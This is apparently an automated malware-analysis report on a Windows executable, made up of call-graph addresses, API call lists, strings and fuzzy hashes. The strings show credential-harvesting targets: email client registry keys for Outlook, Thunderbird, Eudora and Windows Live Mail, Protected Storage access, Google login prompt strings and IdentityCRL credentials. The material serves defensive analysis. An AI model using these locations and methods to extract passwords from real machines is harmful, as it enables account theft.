33978->33970 33979 40f66a 33980 404785 FreeLibrary 33979->33980 33980->33972 33981->33979 33982 40f661 LocalFree 33981->33982 33983 40f645 memcpy 33981->33983 33982->33979 33983->33982 34007 40466b _mbscpy 33984->34007 33986 40f6fa 33987 4045db 7 API calls 33986->33987 33988 40f708 33987->33988 33989 40f7e2 33988->33989 33990 404734 3 API calls 33988->33990 33991 404656 FreeLibrary 33989->33991 33995 40f715 33990->33995 33992 40f7f1 33991->33992 33993 404785 FreeLibrary 33992->33993 33994 40f7fc 33993->33994 33994->33841 33995->33989 33996 40f797 WideCharToMultiByte 33995->33996 33997 40f7b8 strlen 33996->33997 33998 40f7d9 LocalFree 33996->33998 33997->33998 33999 40f7c8 _mbscpy 33997->33999 33998->33989 33999->33998 34000->33841 34002 4078e6 34001->34002 34003 4078c7 _mbsnbcat 34002->34003 34004 4078ea 34002->34004 34003->34002 34004->33966 34005->33974 34006->33977 34007->33986 34021 410a9c RegOpenKeyExA 34008->34021 34010 44458b 34011 40381a 34010->34011 34022 410add RegQueryValueExA 34010->34022 34011->33849 34019 4021b6 memset 34011->34019 34013 4445dc RegCloseKey 34013->34011 34014 4445a4 34014->34013 34023 410add RegQueryValueExA 34014->34023 34016 4445c1 34016->34013 34024 444879 30 API calls 34016->34024 34018 4445da 34018->34013 34019->33851 34020->33849 34021->34010 34022->34014 34023->34016 34024->34018 34025->33872 34027 4075c9 34026->34027 34028 4075bb _mbscat 34026->34028 34029 444212 34027->34029 34028->34027 34046 407e9d 34029->34046 34032 44424d 34033 444274 34032->34033 34034 444258 34032->34034 34054 407ef8 34032->34054 34035 407e9d 9 API calls 34033->34035 34067 444196 52 API calls 34034->34067 34042 4442a0 34035->34042 34037 407ef8 9 API calls 34037->34042 34038 4442ce 34064 407f90 34038->34064 34042->34037 34042->34038 34044 444212 65 API calls 34042->34044 34068 407e62 strcmp strcmp 34042->34068 34043 407f90 FindClose 34045 4442e4 34043->34045 34044->34042 34045->33894 34047 407f90 FindClose 34046->34047 34048 407eaa 34047->34048 34049 406f06 2 API calls 34048->34049 34050 407ebd strlen strlen 34049->34050 34051 407ee1 34050->34051 34053 407eea 34050->34053 34069 4070e3 strlen _mbscat _mbscpy _mbscat 34051->34069 34053->34032 34055 407f03 FindFirstFileA 34054->34055 34056 407f24 FindNextFileA 34054->34056 34057 407f3f 34055->34057 34058 407f46 strlen strlen 34056->34058 34059 407f3a 34056->34059 34057->34058 34061 407f7f 34057->34061 34058->34061 34062 407f76 34058->34062 34060 407f90 FindClose 34059->34060 34060->34057 34061->34032 34070 4070e3 strlen _mbscat _mbscpy _mbscat 34062->34070 34065 407fa3 34064->34065 34066 407f99 FindClose 34064->34066 34065->34043 34066->34065 34067->34032 34068->34042 34069->34053 34070->34061 34071->33494 34072->33498 34073->33505 34074->33504 34075->33511 34076->33508 34077->33503 34422 43ffc8 18 API calls 34236 4281cc 15 API calls 34424 4383cc 110 API calls 34237 4275d3 41 API calls 34425 4153d3 22 API calls 34238 444dd7 _XcptFilter 34430 4013de 15 API calls 34432 425115 111 API calls 34433 43f7db 18 API calls 34436 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34240 4335ee 16 API calls 34438 429fef 11 API calls 34241 444deb _exit _c_exit 34439 40bbf0 138 API calls 34244 425115 79 API calls 34443 437ffa 22 API calls 34248 4021ff 14 API calls 34249 43f5fc 149 API calls 34444 40e381 9 API calls 34251 405983 40 API calls 34252 42b186 27 API calls 34253 427d86 76 API calls 34254 403585 20 API calls 34256 42e58e 18 API calls 34259 425115 75 API calls 34261 401592 8 API calls 33162 410b92 33165 410a6b 33162->33165 33164 410bb2 33166 410a77 33165->33166 33167 410a89 GetPrivateProfileIntA 33165->33167 33170 410983 memset _itoa WritePrivateProfileStringA 33166->33170 33167->33164 33169 410a84 33169->33164 33170->33169 34448 434395 16 API calls 34263 441d9c memcmp 34450 43f79b 119 API calls 34264 40c599 43 API calls 34451 426741 87 API calls 34268 4401a6 21 API calls 34270 426da6 memcpy memset memset memcpy 34271 4335a5 15 API calls 34273 4299ab memset memset memcpy memset memset 34274 40b1ab 8 API calls 34456 425115 76 API calls 34460 4113b2 18 API calls 34464 40a3b8 memset sprintf SendMessageA 34078 410bbc 34081 4109cf 34078->34081 34082 4109dc 34081->34082 34083 410a23 memset GetPrivateProfileStringA 34082->34083 34084 4109ea memset 34082->34084 34089 407646 strlen 34083->34089 34094 4075cd sprintf memcpy 34084->34094 34087 410a0c WritePrivateProfileStringA 34088 410a65 34087->34088 34090 40765a 34089->34090 34091 40765c 34089->34091 34090->34088 34092 4076a3 34091->34092 34095 40737c strtoul 34091->34095 34092->34088 34094->34087 34095->34091 34276 40b5bf memset memset _mbsicmp

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040832F
                                                                                                                                                                • memset.MSVCRT ref: 00408343
                                                                                                                                                                • memset.MSVCRT ref: 0040835F
                                                                                                                                                                • memset.MSVCRT ref: 00408376
                                                                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                • memcpy.MSVCRT ref: 0040840A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                • API String ID: 1832431107-3760989150
                                                                                                                                                                • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                • String ID: ACD
                                                                                                                                                                • API String ID: 379999529-620537770
                                                                                                                                                                • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                • atoi.MSVCRT ref: 00401FE0
                                                                                                                                                                • memset.MSVCRT ref: 00402003
                                                                                                                                                                • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                • memset.MSVCRT ref: 00402086
                                                                                                                                                                • memset.MSVCRT ref: 0040209B
                                                                                                                                                                • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                • memset.MSVCRT ref: 00402018
                                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00402177
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                • API String ID: 1846531875-4223776976
                                                                                                                                                                • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,76DC0A60,?,00000000,?,?,?,0040CF60,76DC0A60), ref: 00404AB8
                                                                                                                                                                  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76DC0A60), ref: 00404ADE
                                                                                                                                                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                • API String ID: 745651260-375988210
                                                                                                                                                                • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00403E54
                                                                                                                                                                Strings
                                                                                                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                • API String ID: 1197458902-317895162
                                                                                                                                                                • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                • String ID: h4ND$k{u
                                                                                                                                                                • API String ID: 3662548030-1380338756
                                                                                                                                                                • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                                                                                • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                • memcpy.MSVCRT ref: 0040FBE4
                                                                                                                                                                • memcpy.MSVCRT ref: 0040FBF9
                                                                                                                                                                  • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                • API String ID: 2768085393-1693574875
                                                                                                                                                                • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0044430B
                                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                                                                                                                                • memset.MSVCRT ref: 00444379
                                                                                                                                                                • memset.MSVCRT ref: 00444394
                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                Strings
                                                                                                                                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                • Store Root, xrefs: 004443A5
                                                                                                                                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                • API String ID: 832325562-2578778931
                                                                                                                                                                • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040F567
                                                                                                                                                                • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                • memcpy.MSVCRT ref: 0040F652
                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
